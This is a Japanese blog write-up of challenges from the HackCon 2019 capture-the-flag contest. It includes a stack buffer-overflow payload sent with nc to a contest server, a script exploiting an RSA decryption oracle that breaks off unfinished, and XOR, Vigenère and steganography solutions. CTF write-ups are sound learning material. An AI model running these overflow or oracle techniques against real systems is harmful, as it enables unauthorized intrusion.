HackCon 2019 Writeup - よっちんのブログ

この大会は2019/8/23 4:45(JST)～2019/8/23 22:00(JST)に開催されました。
今回もチームで参戦。結果は1083点で505チーム中78位でした。
自分で解けた問題をWriteupとして書いておきます。

Discord (Misc)

Discordに入り、#announcementsチャネルのメッセージを見ると、フラグが書いてあった。

d4rk{w3lc0m3_its_d4rk_h3r3}c0de

Weird Text (Misc)

Brainf*ck言語。https://sange.fi/esoteric/brainfuck/impl/interp/i.htmlで実行する。

D'`$@"][[ZX{Wx0/S-t1O`on&m*6jF3ge{SRQ`_u)9xqYun43kpihg-,jihgfH%c\aZ~}|VUZYXQVOsSRQPOHGkK-,BGF?cba`#"8=<;:3W705.RQ1qp.-&J*j('&}C{"!x}|u;yxqYun432jonmf,jihgfH%c\aZ~}|?UZSRvPONMRQPImMFEDIBfed'=BA@?>7[;{32V65.3,PONon,+*#"!EfeBzyx}v<;:9wponsrk1RQmlejc)('_d]b[!BXWV[ZSwWVONSLKonmMLK-IBf)dD&BA:98\[Z:3y76/St,+Op('KJI)"!~Ded"y~}|u;yxqYun432pongfed*hgfH%c\aZ~}|\[Z<Rv9ONSRQJImMFEDIBfed>&<A@?>7[;{32V65.3,PON.nm%$)"F&feBzyx}v<;:9wponsrk1RQmlejc)('eG]\[Z~X]\[ZYRvPUNSLpoONGFjJIBA@E>b%A@?87[5492VUTSt,+Op('KJI)"!~Ded"y~}|u;yxqYun432jonmf,jihgfH%c\aZ~}|{[TSRWVOsS54JOHlk.JIHAeEDCB;@?8\6|:32V05.R21q/('K%$#"FEfeBz!xw|uzs9wpotsrqj0Qgfe+chg`_^$bDZ_^]VzZYRWVUNrRQ3IHGLEiI+AF?cb%A@?87[|49876/.R2+*/(L,+*j(!~D$dc!x}vu;sxwpun4Ukj0nmf,diha'_dcb[!BXWV[ZSwW9OTSLKPImMLK-IBf@(>=BA@9]=<5:32V65.3,Pqp.-&J*#(!~D|#"yx>|^]yxq7Xnsrkjoh.fNdcha'&%$bDZ_^]VzZYRWVUNrqpJOHlLEJCg*@?DC<`_^>=<5:32V65.3,P*p.-&JI#('~D$#"!x>_{tyr8YXtmrk10/.fN+Lhg`_d]#"!_^WVUZSwQPUNMLp3INGFEihg*)ED=aA#"8=<;:3W705.RQP*/(-&J$)"'~Ded"y~}v<;:xq7Xnsrkjoh.fNdcha'&%]baZ~X]V[ZSwWVUNSRQPImlkKDIHG@?c=aA:?>7[ZYX8765.3,P*p.-&JIH(!&}C#c!x}|u;yxqYun432pongfed*hgfH%c\aZ~}|{[TSRWVOsS54JOHlkjDIBGFE>b%A@?87[5492VUT.-,P0)o'&J*j('&}CBA@a}v{zyr8YXtmrk10Qg-kd*hgfH%c\aZ~A]V[TSXWPtT6LKJImlLE-IBAeED=%;_?>=}|:3W165.-Qr*Non&%I#"F~}$#z@~`_{ts98vXnsrkjoh.fNdcha'&%$bDZ_^]VzZYRWVUNr54POHGFj-,BGF?cb%A@?87[5492V0/.R2+0)('KJ*)"!E%|#"y?`vut:xqYun43qponmfN+Lhg`_d]#"!~^]\UTYRvPUNSLpJONMLEiI+AF?cb%A@?87[5492V0/.R2+0)('KJ*)"!E}|{A!~}_uzs9qYun43qponmfN+Lhg`_d]#aZYX|V[ZSRWPtsMRQPIHGkK-,BGF?cba`#"8=<;:3W705.R,10/.-&J*j('&}CBcb~w|u;yxqYun4321onmfN+Lhg`_d]#"!~^]\UTYRvPUNSLpJIHMLEDhBGFE>C<;_^>=6;4X276/S32+*N.nm%IH('&feBz!x}vu;yxqYun432ponmfN+c)gfHdc\"Z_XW\UySXQPt7SRQPOHGkK-IHGF?>bB;#?>=<5Yzy765432+*N.-&%Ij"'&}C#c!xw|ut:[wvun4Ukjong-eMib(fH%cba`_X|V[ZYXQVOsSRQPONGk.JCHGF?>b%A@?87[;:9876/S3,+*)(L,+$#G'&%$d"y?}v{tyr8vuWVrkjongf,jihgfeG]#[`_X|\[ZYX:Pt7SRQPOHGkKJIHG@d>=<A:98\<54X87w5.-210/(L,+$j"'~D${"!x>|{]sxwpo5Vrkjongf,diba`edc\"CB^W\Uy<;WPUTSRQJn1MLEDhg*)E>b%A@?87[;4X81w/.32+O)o-,%$H"!&}C#c!x}|u;yrwvo5mlqponmf,jibg`e^$baZ~X]V[ZSwWVUNSRQPImlkKDIBf)dD=B;:^!~<;4X87wv432+*N.'m%$)(!EfeB"!~}_u;yxwvo5Vrkjongf,Mchgf_^$bDZ_^]VzZYXWVOsSRQJnHGFjJIBA@E>b%A@?87[;:3W1UT43210/.'K%$#G!&%|BA@x}v{zyr8vXnsrkjoh.leMihg`&d]baZYX|V[TSRQVONrLKPOHMFjDIHAe(>=<`#">765Y9270T.-,P0)o'&J$#G!~D|#"!x>|{ts9Zvutsrkpi/mfNjibg`_^$b[Z~^@?UZSRvV87MqQ32NMLEDh+*FE>=<`@">76;4X816/.-Q+0/.',%I)"!E%$#z@~`_{ts9qvon4Uqpingf,jihgfH%c\"`_^]\[TSwQPUNMqQJnH0LKJIBAe(DC<;:9]~};:9870T4t2+*Non&+$H(!&}C{Ayxw|uzs98votsrk1onmfN+ihaf_^$ED`Y^WVz=<XWPOsS54JImMFKJIHAe(DC<;_^]7<;:981U5.3,P0).'&J*)"!~}C{"!xw|ut:[qvon4Ukpi/gled*Ka`edc\"`_^@?UZSRvPt7SRQPOHGkEDIHG@d>C<;:9]=6Z49876/.R210)o'&J*)i!~D|#"yx>vuzyrwpun4Uqpihg-kjihgfH%c\"`B^W{UTSRQVONrLKJOHlLE-IBAeEDCBA#"8\<5:32V65.R21*p.-&J$)"'~D|#"!x>|uts9wpotsrqj0hmlkjihgfe^]#DZ_^]VzZYXWVOsSRQJnHMFj-IHG@d'=BA:?87[;4z8765432+*Non&+$H"'&}|{"y?w|uzs9Zvutsrkpi/mleMihg`&d]\aZ_X|\[TYXQuUTSR43ImM/KJIBAe(>=BA@987[|:9876/.3,P*Non&+$)"F&}C{"yx}v<;:[Zvotm3qponmfN+chg`_^$b[Z~^]V[ZYRvPUTSLpJINGFjJIHG@dD&BA:^87<5Y987w/43,P0)o'&J*j('&}CBA!x}|u;y[wpun4Ukjong-NMcba'eGcba`_X|\[ZYXQPUNMqQPIHGkEDIHG@d>C<;@987[549270Tu-2+O)o'&J$#G'~}${A!x>|{ts9Zvutsrkpi/gOejc)gIed]b[`Y}@?UZSRvVOTSLpPIHGkKJIHG@d>&<;@9]=6|:3W70/.R210)o'&J*)('&}Cd"!x>_uzyxwp6WVlkjongf,jihgfH%c\"Z_XW{[ZYXQuOTSLpPIHGkKJIHG@d>=<A:98\<54X81w/.32+O)o'&J*j(!E}${A@?}_uzyxqpo5srqSi/glkjiha'eGcba`_X|\[ZYX:Pt7SRQPOHGkKJIHG@dD&BA:^87<54X81w543,P0)o'&J$#G!~D$#cy?`_{ts9wponsrk1ihglkjiba'_dcbaZY}@?UZSRvV87SLKo2NGFjDCHG@dD=BA:9]=6;:981U5.R210/.-&J*)"!E%$d"y?}_uzsr8putsl2ponmfN+ihaf_^$E[!_^@?UZSRv98TSLKo2NGFjJIHG@dDC%;:?8\};:921U54321*p(L&+*)"'~D${A!x}|u;yrwpun4rkjong-e+ihaf_^$\a`_XW{UTYXQPtTMLKo2NGFjJIHAF?c=BA@?>=<5Y9276/SR210)o'&J*j('&}C{"y?}_u;yxwvo5srqpohg-e+ihgIed]#[Z_^W{[TYXWVOsMRQPIHGkKJIHG@d>=<;:?8\6|:3W165.-Q10)o'&J*)(!~D$d"y?`vutyxwp6WVlkjongf,jihgfH%c\"Z_X|VUZSRvV87MqQ32NMLEDh+*FE>=<`#">=65Y9270543,P0p(L&+*)"'~D|#"!x>|uts9wpotsrqj0Qglkd*hgfH%cba`_X|VUZSRvuU76LKo2NGFjJIHG@d>=<;:?8\}|49870/.R2+0)('K%*)(!E}|{A@?w|{zyr8vXnsrkjoh.leMihg`&dFEa`_X|\[ZYXQ9UNSRKoO10FKDh+GFE>CB;_?>=6|:3W765.-Q10/(L,l$#(!EfeB"y?}_u;yrqpon4lTjohg-kdcha'edc\"ZB^]\[TxXQ9UNSRKonH0LKJIBAe(DC<;_?8=<;432Vw54-,PO)o'&J*j('&}C{"y?}|ut:rqvo5mlqpohg-ed*)gfed]\"ZY^]\Uy<XWPUTMqK3INMLEihgGFE>=BA@?8\6|:32V6v.-,P*p(L&+*#GF&feBzyx}v<]yxwpun4lTjohg-Njchgf_^$bDZ_^]VzZYRWVUNrqKJOHMFjJI+Ae?>CBA:?87[;{z276543,PON('&%$H('&feB"y~}v{zyr8ponsrqj0hmf,+ihgfH%c\aZ~^]V[ZYRvPUTSRQJn10FKDh+GFE>CB;_?>=6|:3W76v.3,P0).'&J*j('&}C{"!x}|u;s9qvon4rkpingf,Mcba'eGc\[!_X|V[TSXWPOsS54JImMFKJCgA@ED=B;_9>=<5YX8765.R210/.'K+*)"!E%$#z@aw|{tyr8potml2johmled*hgfH%cba`_X|V[TSXWPOsS54JIm0/KJIHAF?cCBA@?>=6;4X876/S321*p(L,+*#i'&}C#"!x>v{t:rwvo5srqSi/mfNdc)gIed]b[`Y}@VUySXWPtsSLQJn10LEJCgA@ED=B;_?>=6;:981Uvu-2+O)o'&%I#G'&feBzb~w|{t:xqpun4lqponmf,+ihgfH%c\"!Y^]\UZSRv9UNSRKo2NGFjJIHG@dD=<A@?8\654981U54321*p(L&+*)"'~D${A!x}v<zs9wvunVl2ponmfN+ihgIed]#[`_^]Vz=YRWVUNMqpPIHGkKDIHG@?cCBA:"8\<;4381UT.32+*)Mnm%$#(!~}C#cy?}|u]s9wvo5mlqpohg-kjibg`_^$\[ZY}@?UZSRvVOTSLpPIHGkKJIHG@d>&<;@9]=}|:9876/.R,+O)o'&J*)('&}Cd"!x>|u]yxwpo5srkjoh.fN+ihaf_^$baZ_^]\Uyx;:VUTSLKo2NGFjDCHG@d>C<;:9]~6;4381UT.32+*)M-,+*#i'&}C#"!x>|{ts9qYun4Ukpi/gle+cba'_^]b[!Y}@VUyYRQVOs6RQJINGk.DCHAFE>C<`@9!=<5Y9216543,P0)o-&J*#(!~D${"yx>|u]s9Zvutsrkpi/mleMihg`&^cb[Z~^@?UZYXWPtTSLQJnH0LKJIBAe(DC<;_^]7<;:981U5.3,P*p.-&JIHG'&feBzyx}v<zyrwvo5srqSi/mleMib(fH%c\aZ~}|\[TYRv9ONSRQJImMFEDIBfed>bBA:^>=6|:3W70/.R210/.'K+$)(!EfeB"y?}v{zyr8vunmlqj0hPfkdc)gfH%]\a`_XW{[ZYX:Pt7SRQPOHGFjJ,HG@d'=BA:?87[;4z8765432+*N.'&+$H('~%${A!~}_u;yxqpo5mrk1Rhmlkjihgfe^]#DZ_^]VUyYRQVUNMqQPIHGkKJIHG@d>=<A:98\<54X87w5.-210/(L,+$j"'~Dedzy?>v{zsr8Yun4Ukpi/glkdc)('_d]#DZ_^]VzZYXWVOsMLKoIHMFEJIBfFE'=<A@?8\6|:32V0T.321*N.'&%*)(!Efe#"y?}|utyr8vonm3kpoh.leMihg`&d]baZY}@VUyYRQVOsS5KJIHl/EJIHAe?D=BA@9]=<;4X870T4321*p(L&%$H('&}C#c!x}|u;yxqYun4UTjih.fNdcha'&dFb[`Y}@?UZSRWPt76LKonNG/EiC+G@EDCB;_9>=<5:32VUT4t,10).'K%$#G'~}${"y?w_{ts9wpun4lTjohmlkjib(fH%c\"`_^]\[TSwQPUNMqQJnH0LKJIBAeEDCBA#"8\6;:9876/.R210/.'K+*)"F~}C#"y?wv{t:rwvunsl2ponPle+ihgfH%cba`_X|VUZYRvP8TSRQJONMLEiCBA@?c=aA:?>7[5{321Uvu-2+ONon&%I#"F&%${"y?w|ut:rqpon4Ukpi/gOejc)gIe^]#[Z~^]\[=<XWPt7SRQPOHGkKJIHG@d>=BA:9]=<54Xy76/St,+O)o'&%I)i!&}${A!~}_u;sxwputml2ponmfN+chg`_^$b[Z~^]V[ZSwWVOTSLp3ONMLEDhH*)ED=a$:^>=6|:3W765.-Q10)o'&J*)('&}C{cy?}_uzsr8vunVrk1onmfN+ihaf_^$\aZYX|VUZSXQVOsS5QPIHGkE-IBAe(>=<`#">=65Y38765.-Q10)o'&%I)('&}C#"y?}v{zyr8vunmlqj0hPfkdc)gfH%]\"ZYX|\UTYXQPUNMq43IHGkE-IBAe(DC<;:9]765Y9870/.R2+*Non&%I#"FED${"y?w|{zyr8vonm3kSinmlkdib(fHdc\"`_^W{[TSRWVOsSRQPOHGFjJIH*)E>b<;@?8=6Z:3y76/St,+Op('K+*j(!~Ded"y~}v<;sr8YXtmrk1oQglkd*Ka`e^]#D`_X|VUZSwWVOs6RQJIHl/KDCHAFE>C<`#"8=6Z:98765.3,P0/.-&J*j(!Efe#z@~}v<]\xwpun4rkSonmlkdihg`&d]\[Z~^@?UZSRvPt7SRQPOHGkKJIHG@d>C<;:9]=6|:3Wx0/43,P0)o'&J$#G'&fe#z@~}v<zyxqpun4Ukpi/gled*bJ`_^$bDZ_^]VUyYX:Pt7SRQPOHGkKJIHG@d>CBA@?8\}|:9876/.R2rq/(L,+$j"'~Ded"y~}v<]sxqp6tml21onmfN+Lhg`_d]#a`Y^]Vz=SXWPONMqQJIHGLEiC+G@EDCB;_?>=6|:3W76v.3,P0)o'&%Ij('&%${Ab~w|u;yxwvunVl2pohmle+chg`&dc\[!BXWV[ZSwWVONSLKonmMFKJCgGF?DCB;_?>=}|:9876/S-2+0)(L,%$#G'&%edz@a}v{zyr8vunml2ponmlkdcba'eGcb[Z~^]\Uy<XWPUTMqK3INMLEihg*)E>b%A@?87[;{921U/u3,+*Non&%*)(!E%|{Ab~w|u;yxqYonmrqj0ngled*bg`&dFEa`_X|\>=YXWPOs65KPIHGFjJIHAe?>bBA@"!7[;{32V65.3,P0)o'&%I)"FEfeBzyx}v<zyrwvo54rkji/mfN+Lhg`_d]#"!_XW\[ZYRv9ONSRQJIm0/KJIHAF?c=<;:?>=<;4X270TSt,+Op('K+*#i'&}C#"!xwv<]yxwpunsl2ponmfN+Lhg`_d]#"Z_X|V[TYRv9ONSRQJImMFEDIBfed'CBA@?>=<5Y9216543,Pqp.-&J$)"!~}C{"yx}v<;sr8vunm3qpong-edcbaf_%$bDZ_^]VzZYRWVUNrRQP2HGFjJIBGFE>b%;@?8\6|:32V05.RQP0/(-&+$H('&feB"y~}v{zyr8potml2pohmf,+ihgfH%c\aZ~^@?UZYRv98TSLKo21GLEiCHGFED=a$:?>7[ZY9876v43,P0)o'&J*j('&}CBA!~}|^]s9Zvutsrkpi/gOejc)(`H^]b[!~^]\UTYRvPUTSLpJINGkK-,BGF?cb%A@?87[5492VUTSt,+O/.n,+*)"F&%${cy?}|{zs[q7utVrkji/mfN+Lbgfe^]#aC_X|\[Z<RWVOTSLpPO10FEJCg*@E>=B;_L

Malbolge言語っぽい。http://www.malbolge.doleczek.pl/で実行する。

0011 0002 0000 0010 0001 000f 0001 0004 0000 000e 000c 000d 000b 0006 000a 0003 0009 0000 0004 0012 0000 000b 0001 0000 00b1 0500 b62b 0400 b24c 0312 4c02 120e 0000 0002 0002 0032 0000 000a 0002 000d 000c 0009 0005 0000 0001 0006 0000 000b 0001 0000 00b1 0100 b72a 0500 0000 0100 0100 1d00 0000 0a00 0100 0900 0800 0000 0200 0000 0000 0700 0600 2000 5629 3b67 6e69 7274 532f 676e 616c 2f61 7661 6a4c 2815 0001 6e6c 746e 6972 7007 0001 6d61 6572 7453 746e 6972 502f 6f69 2f61 7661 6a13 0001 3b6d 6165 7274 5374 6e69 7250 2f6f 692f 6176 616a 4c15 0001 7475 6f03 0001 6d65 7473 7953 2f67 6e61 6c2f 6176 616a 1000 016e 6f69 7470 6563 7845 2f67 6e61 6c2f 6176 616a 1300 0174 6365 6a62 4f2f 676e 616c 2f61 7661 6a10 0001 6e65 675f 6761 6c66 0800 0121 0020 000c 1f00 071e 001d 000c 1c00 0765 6430 637d 7435 3362 5f35 7431 5f74 405f 3362 4062 5f33 6640 635f 6874 3177 5f33 6741 7567 6e41 6c5f 6331 7233 7430 3565 7b6b 7234 6436 0001 0000 0109 0008 000c 6176 616a 2e6e 6567 5f67 616c 660d 0001 656c 6946 6563 7275 6f53 0a00 011b 0007 736e 6f69 7470 6563 7845 0a00 0156 293b 676e 6972 7453 2f67 6e61 6c2f 6176 616a 4c5b 2816 0001 6e69 616d 0400 0165 6c62 6154 7265 626d 754e 656e 694c 0f00 0165 646f 4304 0001 5629 2803 0001 3e74 696e 693c 0600 011a 0007 1900 0718 0017 000a 1600 1500 0914 0008 1300 0812 0007 000a 2200 3700 0000 beba feca

hexデコードすると、フラグが逆順で含まれていることが分かるので、逆順にする。

enc = '0011 0002 0000 0010 0001 000f 0001 0004 0000 000e 000c 000d 000b 0006 000a 0003 0009 0000 0004 0012 0000 000b 0001 0000 00b1 0500 b62b 0400 b24c 0312 4c02 120e 0000 0002 0002 0032 0000 000a 0002 000d 000c 0009 0005 0000 0001 0006 0000 000b 0001 0000 00b1 0100 b72a 0500 0000 0100 0100 1d00 0000 0a00 0100 0900 0800 0000 0200 0000 0000 0700 0600 2000 5629 3b67 6e69 7274 532f 676e 616c 2f61 7661 6a4c 2815 0001 6e6c 746e 6972 7007 0001 6d61 6572 7453 746e 6972 502f 6f69 2f61 7661 6a13 0001 3b6d 6165 7274 5374 6e69 7250 2f6f 692f 6176 616a 4c15 0001 7475 6f03 0001 6d65 7473 7953 2f67 6e61 6c2f 6176 616a 1000 016e 6f69 7470 6563 7845 2f67 6e61 6c2f 6176 616a 1300 0174 6365 6a62 4f2f 676e 616c 2f61 7661 6a10 0001 6e65 675f 6761 6c66 0800 0121 0020 000c 1f00 071e 001d 000c 1c00 0765 6430 637d 7435 3362 5f35 7431 5f74 405f 3362 4062 5f33 6640 635f 6874 3177 5f33 6741 7567 6e41 6c5f 6331 7233 7430 3565 7b6b 7234 6436 0001 0000 0109 0008 000c 6176 616a 2e6e 6567 5f67 616c 660d 0001 656c 6946 6563 7275 6f53 0a00 011b 0007 736e 6f69 7470 6563 7845 0a00 0156 293b 676e 6972 7453 2f67 6e61 6c2f 6176 616a 4c5b 2816 0001 6e69 616d 0400 0165 6c62 6154 7265 626d 754e 656e 694c 0f00 0165 646f 4304 0001 5629 2803 0001 3e74 696e 693c 0600 011a 0007 1900 0718 0017 000a 1600 1500 0914 0008 1300 0812 0007 000a 2200 3700 0000 beba feca'

enc = enc.replace(' ', '').decode('hex')
print enc
dec = enc[::-1]
print dec

実行結果は以下の通り。

             
                  ｱ ｶ+ ｲLL     2
                   ｱ ｷ*     
                  V);gnirtS/gnal/avajL( nltnirp maertStnirP/oi/avaj ;maertStnirP/oi/avajL tuo metsyS/gnal/avaj noitpecxE/gnal/avaj tcejbO/gnal/avaj neg_gal !       ed0c}t53b_5t1_t@_3b@b_3f@c_ht1w_3gAugnAl_c1r3t05e{k eliFecruoS    avaj.neg_galf
  snoitpecxE
 V);gnirtS/gnal/avajL[( niam elbaTrebmuNeniL edoC V)( >tini<    
      
" 7   ｾｺﾊ
ﾊｺｾ   7 "
         
     <init> ()V Code LineNumberTable main ([Ljava/lang/String;)V
Exceptions 
flag_gen.java     6d4rk{e50t3r1c_lAnguAg3_w1th_c@f3_b@b3_@t_1t5_b35t}c0de       !flag_gen java/lang/Object java/lang/Exception java/lang/System out Ljava/io/PrintStream; java/io/PrintStream println (Ljava/lang/String;)V                    
       *ｷ ｱ                   
   2     LLｲ +ｶ ｱ

d4rk{e50t3r1c_lAnguAg3_w1th_c@f3_b@b3_@t_1t5_b35t}c0de

Small icon much wow (Stego)

jpgファイルが添付されている。

$ exiftool stego.jpg ExifTool Version Number         : 10.10
File Name                       : stego.jpg
Directory                       : .
File Size                       : 47 kB
File Modification Date/Time     : 2019:08:23 05:57:16+09:00
File Access Date/Time           : 2019:08:23 06:52:19+09:00
File Inode Change Date/Time     : 2019:08:23 05:57:16+09:00
File Permissions                : rwxrwxrwx
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 1
Y Resolution                    : 1
Resolution Unit                 : None
Y Cb Cr Positioning             : Centered
Compression                     : JPEG (old-style)
Thumbnail Offset                : 202
Thumbnail Length                : 13391
Comment                         : Compressed by jpeg-recompress
Image Width                     : 1116
Image Height                    : 102
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1116x102
Megapixels                      : 0.114
Thumbnail Image                 : (Binary data 13391 bytes, use -b option to extract)

サムネイルを抽出する。

$ exiftool -b stego.jpg > thumbnail.jpg

ヘッダにごみが入っているので、取り除くと、QRコードの画像データになった。
f:id:satou-y:20190828062759j:plain
QRコードを読み取ると、フラグだった。

d4rk{flAg_h1dd3n_1n_th3_thumbnail}c0de

baby b0f (Pwn)

Ghidraでデコンパイルする。

undefined8 main(void)

{
  undefined8 local_16;
  undefined2 local_e;
  int local_c;
  
  alarm(0x1e);
  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stdin,(char *)0x0,2,0);
  setvbuf(stderr,(char *)0x0,2,0);
  local_c = -0x35014542;
  local_16 = 0;
  local_e = 0;
  fgets((char *)&local_16,0x100,stdin);
  if (local_c == -0x21524111) {
    system("cat ./flag.txt");
  }
  else {
    puts("Try Again");
  }
  return 0;
}

BOFでlocal_cを-0x21524111(=0xdeadbeef)にすればよい。

$ python -c 'print "A"*10+"\xef\xbe\xad\xde"' | nc 68.183.158.95 8989
d4rk{W3lc0me_t0_th3_w0rld_0f_pwn}c0de

d4rk{W3lc0me_t0_th3_w0rld_0f_pwn}c0de

OTP (Crypto)

同じ鍵のXOR暗号メッセージがあり、両方とも"meme"が含まれている。https://github.com/SpiderLabs/cribdragを使って推測していく。

$ python -c "print '\x05F\x17\x12\x14\x18\x01\x0c\x0b4'.encode('hex')"
054617121418010c0b34
$ python -c "print '>\x1f\x00\x14\n\x08\x07Q\n\x0e'.encode('hex')"
3e1f00140a0807510a0e
$ python xorstrings.py 054617121418010c0b34 3e1f00140a0807510a0e
3b5917061e10065d013a
$ python cribdrag.py 3b5917061e10065d013a
Your message is currently:
0	__________
Your key is currently:
0	__________
Please enter your crib: meme
0: "V<zc"
1: "4rk{"
*** 2: "zcsu"
3: "k{}c"
*** 4: "suk8"
5: "}c0d"
6: "k8l_"
Enter the correct position, 'none' for no match, or 'end' to quit: 1
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0	_4rk{_____
Your key is currently:
0	_meme_____
Please enter your crib: meme
0: "V<zc"
1: "4rk{"
*** 2: "zcsu"
3: "k{}c"
*** 4: "suk8"
5: "}c0d"
6: "k8l_"
Enter the correct position, 'none' for no match, or 'end' to quit: 5
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	_4rk{meme_
Your key is currently:
0	_meme}c0d_
Please enter your crib: d4rk
0: "_mem"
1: "=#tu"
2: "s2l{"
3: "b*bm"
4: "z$t6"
5: "t2/j"
*** 6: "bisQ"
Enter the correct position, 'none' for no match, or 'end' to quit: 0
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	d4rk{meme_
Your key is currently:
0	_meme}c0d_
Please enter your crib: c0de
*** 0: "Xisc"
1: ":'b{"
*** 2: "t6zu"
*** 3: "e.tc"
4: "} b8"
*** 5: "s69d"
6: "eme_"
Enter the correct position, 'none' for no match, or 'end' to quit: 6
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0	d4rk{meme_
Your key is currently:
0	_meme}c0de

d4rk{meme__meme}c0de

Noki (Crypto)

Vegenere暗号で、鍵長は暗号文の長さと同じ。平文がフラグの形式になるよう、わかる範囲で鍵を割り出す。

暗号：g4iu{ocs_oaeiiamqqi_qk_moam!}e0gi
平文：d4rk{                       }c0de
鍵　：d rk{                       }c de

同じ文字が鍵になっていると推測できる。1文字につき、2パターン復号結果があるが、全パターンを割り出してみる。

import string

def decrypt_char(c):
    index = string.lowercase.index(c)
    index /= 2
    return str([string.lowercase[index], string.lowercase[index + 13]])

enc = 'g4iu{ocs_oaeiiamqqi_qk_moam!}e0gi'

flag = ''
for c in enc:
    if c in string.lowercase:
        flag += decrypt_char(c)
    else:
        flag += c

print flag

実行結果は以下の通り。

['d', 'q']4['e', 'r']['k', 'x']{['h', 'u']['b', 'o']['j', 'w']_['h', 'u']['a', 'n']['c', 'p']['e', 'r']['e', 'r']['a', 'n']['g', 't']['i', 'v']['i', 'v']['e', 'r']_['i', 'v']['f', 's']_['g', 't']['h', 'u']['a', 'n']['g', 't']!}['c', 'p']0['d', 'q']['e', 'r']

フラグの形式で、意味が通るよう選択していく。

d4rk{how_uncreative_is_that!}c0de

Ez Pz (Crypto)

$ nc 68.183.158.95 7777
Welcome to your local encryption decryption service John
On tonights menu --- 10485910661373480596140468854797253830914908725803272876816485686276902628057778759292305172061019044232250676293059139641000026951403933590024167944514335730442842345172670561172487230954584512528850778122556817196231537448296299122819959704605190626895738163232844957263442903361359063323170113054176766100646161492250998985578726049258046931390538377407183812034754758386989178143750650697347917443227761561824023706148845476500095709590668192917643455438038442372272132195555328961866837514080656562120508270196987106742991883175814472291179326357087232235997164857526373785124704041862782850941054794903948171602
1)Encrypt
2)Decrypt
3)Exit
1
enter ur message : 
0
4197528120670400604876365921281280670066912072309719597467085586651376952767836064318403163072477738894389379324157191523330596628259489532064512816202899473604108766984812825250598920658450357975235978884050646390324352664360102930754820052542438358212503529188213139794314891289834056122346987193395334447084629353110915413266903810583873909673043760637815936817983452015825177626263424370114176216290961174188658948839645100299963737114588021649966307823778781830697399450295565104919962189104045301087740851287011455094808299558561584167689492396472457669866048568215209405861472324893291269964058235365023251653
1)Encrypt
2)Decrypt
3)Exit
1
enter ur message : 
1
4841387437522384774124361619251602872465448501042770926818576678627468458296716276680169714999018217529105138514025145535264387216602043459048871487677068167613012104197343310718404978959091650385788384519581650320332410559698312412310847176529293355414777201343044473388838802144112428768953628942580295564158722785916042543242693709327663240799315756208332944377341823521277097380060396511298047362380271070858964307432344338352157598453652942213496946949788457637650822816637223879043738402612308819611294302009250743887053578320294140535288895524510669925790167590487664233745404589230545566703046303464428542162

$ nc 68.183.158.95 7777
Welcome to your local encryption decryption service John
On tonights menu --- 2167978155868718145789182701651894111606761811872320655249646845867721585844478990982394055622719821571828013199591336887400201541025546738659549527436963455797883589082480958397997361105535013530120049614614073156901663406421906434098027397840032892084737122502335884995582228239276109359911278356244595475236509499528057645565094668393942057393090624418329927133729708629090079287374615078380018890961460454949030060543758425094637243710163773121500543680909887009705153913374620205988557231931092229337378178485167012200523893664089721516880471020843552868737496119793732735678689624980372358329325592694357989295
1)Encrypt
2)Decrypt
3)Exit
2
enter text to decipher: 
0
0
1)Encrypt
2)Decrypt
3)Exit
2
enter text to decipher: 
1
1

$ nc 68.183.158.95 7777
Welcome to your local encryption decryption service John
On tonights menu --- 15108440853334769532426406906163695871688520497854231085787178720124346330048643799752954038889766603309175151505531085634738451383150608481459846402028657086623508871785269133740005016610757039272848366105653584354087585393612091397385999382109537185362676739654966914207054413376489825356067537221629825984370686911759911099246324972259857176544320105965510436262691108336130053636047850332321671917073754152027799396595349775972049920312573347022370619290770575948664004432651758305482855164640840117212234653371627973955994147556195646961704317639965512917170646334036741457561162881161444543980966000645864890255
1)Encrypt
2)Decrypt
3)Exit
1
enter ur message : 
0
5516235759159226173742819383442153103210906375498849338536655458648523179884520146243958788103654206700094617524782450575054226367588721466921625870010315870391282423672718228538985973960894818224346099045395693983236691136362473756888380532577314614642045822330139560178697844912058083661736868409911486364345845948187730758906039270560410654294240020955030400009427598646448218700956339252136648330766407566652519581197014145639013896519149465670788229422803527577845102637612590933393923289502602146953126756538690353803432402174381737441825602202880718192300968783511276379068796367298437892223448823392863394887
1)Encrypt
2)Decrypt
3)Exit
2
enter text to decipher: 
5516235759159226173742819383442153103210906375498849338536655458648523179884520146243958788103654206700094617524782450575054226367588721466921625870010315870391282423672718228538985973960894818224346099045395693983236691136362473756888380532577314614642045822330139560178697844912058083661736868409911486364345845948187730758906039270560410654294240020955030400009427598646448218700956339252136648330766407566652519581197014145639013896519149465670788229422803527577845102637612590933393923289502602146953126756538690353803432402174381737441825602202880718192300968783511276379068796367298437892223448823392863394887
48

ここでわかったことは、以下の通り。

・フラグと思われるデータの暗号が提示されている。
・暗号の種類はRSA暗号
・暗号と復号を選択でき、合計2回まで試すことができる。
　暗号はbyte文字列で入力すると、暗号結果を数値で返す。
　復号は数値で入力すると、復号結果を数値で返す。

以下の方針で復号する。

1.nを取得。
　復号で-1を指定すると、その結果はn-1になることを利用する。
2.cの2乗を指定し、復号する。
　mの2乗が得られるが、nが非常に大きいので、Low Public Exponent Attackで復号する。

import socket
import gmpy
from Crypto.Util.number import *

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('68.183.158.95', 7777))

data = recvuntil(s, '3)Exit\n').rstrip()
print data

c = int(data.split('\n')[1].split(' --- ')[1])

#### get n ####
print '2'
s.sendall('2\n')
data = recvuntil(s, '\n').rstrip()
print data
print '-1'
s.sendall('-1\n')
data = recvuntil(s, '\n').rstrip()
print data
n = int(data) + 1

data = recvuntil(s, '3)Exit\n').rstrip()
print data

#### get dec(c**2) ####
print '2'
s.sendall('2\n')
data = recvuntil(s, '\n').rstrip()
print data
c2 = str(c ** 2)
print c2
s.sendall(c2 + '\n')
data = recvuntil(s, '\n').rstrip()
print data
m2 = int(data)

#### get dec(c) ####
m = gmpy.root(m2, 2)[0]
